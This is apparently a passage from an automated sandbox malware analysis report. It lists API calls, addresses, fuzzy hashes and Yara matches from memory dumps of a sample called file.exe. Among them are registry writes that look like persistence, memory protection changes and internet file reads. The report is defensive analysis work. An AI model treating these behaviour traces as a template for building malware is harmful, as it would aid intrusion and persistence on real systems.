                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                        • Instruction ID: 6b615680d3c3bd4f4892dbedb3dbce5f38351b6913765855676d196fc37a38f7
                                                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                        • Instruction Fuzzy Hash: 6C01D8333096119EB7352BFCBCC5E5B2B98EB83A7E3204239E524651F2EF5178015144
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                                                        • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                        • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                                                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                        • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                                                          • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,0042D884,?,?,?,0042D954,0042D955), ref: 0040163B
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,0042D884,?,?,?,0042D954,0042D955), ref: 00401672
                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                        • String ID: string too long
                                                        • API String ID: 2123813255-2556327735
                                                        • Opcode ID: dbd3adb8b6484afca22dc8571a418de7f2fa8100bdd3f65c95f6337441c4357a
                                                        • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                                                        • Opcode Fuzzy Hash: dbd3adb8b6484afca22dc8571a418de7f2fa8100bdd3f65c95f6337441c4357a
                                                        • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                                                        APIs
                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                                                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateOpenSleepValue
                                                        • String ID: mixone
                                                        • API String ID: 4111408922-3123478411
                                                        • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                                                        • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                                                        • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                                                        • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                                                        Strings
                                                        • C:\Users\user\Desktop\file.exe, xrefs: 1000833B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                        • API String ID: 0-4010620828
                                                        • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                        • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                        • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                        • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6CC08CF2,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                                                        • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                                                        • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                                                        • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                        • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                        • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                        • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                        • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                        • __alloca_probe_16.LIBCMT ref: 1000A736
                                                        • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                        • __freea.LIBCMT ref: 1000A837
                                                        • __freea.LIBCMT ref: 1000A843
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: __alloca_probe_16__freea$Info
                                                        • String ID:
                                                        • API String ID: 2330168043-0
                                                        • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                        • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                        • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                        • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                        APIs
                                                        • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                        • __alloca_probe_16.LIBCMT ref: 1000B101
                                                        • __freea.LIBCMT ref: 1000B16D
                                                          • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                        • __freea.LIBCMT ref: 1000B176
                                                        • __freea.LIBCMT ref: 1000B199
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1423051803-0
                                                        • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                        • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                        • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                        • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                        APIs
                                                        • __alloca_probe_16.LIBCMT ref: 004150D5
                                                        • __alloca_probe_16.LIBCMT ref: 0041519E
                                                        • __freea.LIBCMT ref: 00415205
                                                          • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,0042D884,?,?,004035B7,?,?,5(@), ref: 00413CEB
                                                        • __freea.LIBCMT ref: 00415218
                                                        • __freea.LIBCMT ref: 00415225
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1423051803-0
                                                        • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                                                        • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                                                        • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                                                        • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04932D5F
                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04932D74
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04932D82
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04932D9D
                                                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04932DBC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                        • String ID:
                                                        • API String ID: 2509773233-0
                                                        • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                        • Instruction ID: 291d8e9c9a2de9b23263adf075e05c0508d6be20451c93dcc7016320b815ae20
                                                        • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                        • Instruction Fuzzy Hash: 6831F432B00104AFDB149F58DC40FAAB7A8EF49701F5541F9E905EB2A2DB71BD16CB94
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                                        • String ID:
                                                        • API String ID: 3136044242-0
                                                        • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                        • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                        • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                        • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                        APIs
                                                        • _free.LIBCMT ref: 1000C536
                                                          • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                          • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                        • _free.LIBCMT ref: 1000C548
                                                        • _free.LIBCMT ref: 1000C55A
                                                        • _free.LIBCMT ref: 1000C56C
                                                        • _free.LIBCMT ref: 1000C57E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                        • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                        • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                        • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: *?
                                                        • API String ID: 269201875-2564092906
                                                        • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                        • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                        • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                        • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                        • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID: api-ms-
                                                        • API String ID: 3177248105-2084034818
                                                        • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                        • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                        • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                        • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                                                        • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID: api-ms-
                                                        • API String ID: 3177248105-2084034818
                                                        • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                        • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                                                        • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                        • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04949996
                                                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04949BE8
                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04949C2E
                                                        • GetLastError.KERNEL32 ref: 04949CD1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                        • String ID:
                                                        • API String ID: 2112829910-0
                                                        • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                                                        • Instruction ID: 617a67e78cc148dde137d8e82add0848fe4a6fdbd55459ce306b5621ec415725
                                                        • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                                                        • Instruction Fuzzy Hash: 7FD16CB5E002489FDB15CFE8D8809EEBBF9FF89314F18456AE45AEB351D630A941CB50
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32(6CC08CF2,00000000,00000000,00000000), ref: 0041972F
                                                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                                                        • GetLastError.KERNEL32 ref: 00419A6A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                        • String ID:
                                                        • API String ID: 2112829910-0
                                                        • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                                                        • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                                                        • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                                                        • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                                                        APIs
                                                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04931C6C
                                                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04931C8F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileInternet$PointerRead
                                                        • String ID:
                                                        • API String ID: 3197321146-0
                                                        • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                                                        • Instruction ID: a5a8c383a566e357223897e7fa66ea74bf5331801c2a528307aa7bbe19dea5d1
                                                        • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                                                        • Instruction Fuzzy Hash: 77C15B709002189FEB24DF54CC85BE9B7B9EF4A305F1041E9E509A72A0DB75BE84CF95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: AdjustPointer
                                                        • String ID:
                                                        • API String ID: 1740715915-0
                                                        • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                        • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                        • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                        • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AdjustPointer
                                                        • String ID:
                                                        • API String ID: 1740715915-0
                                                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                        • Instruction ID: b47c96d65a9c32922402c14284ab65e201839dd1ad4cbd5c89f8cfbab560cee2
                                                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                        • Instruction Fuzzy Hash: 3A51E572600606AFEB398F58D848BBA73B9EF42316F14453DDA554B292E731F950CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AdjustPointer
                                                        • String ID:
                                                        • API String ID: 1740715915-0
                                                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                        • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                                                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                        • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0493186C
                                                          • Part of subcall function 04939AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04939AF5
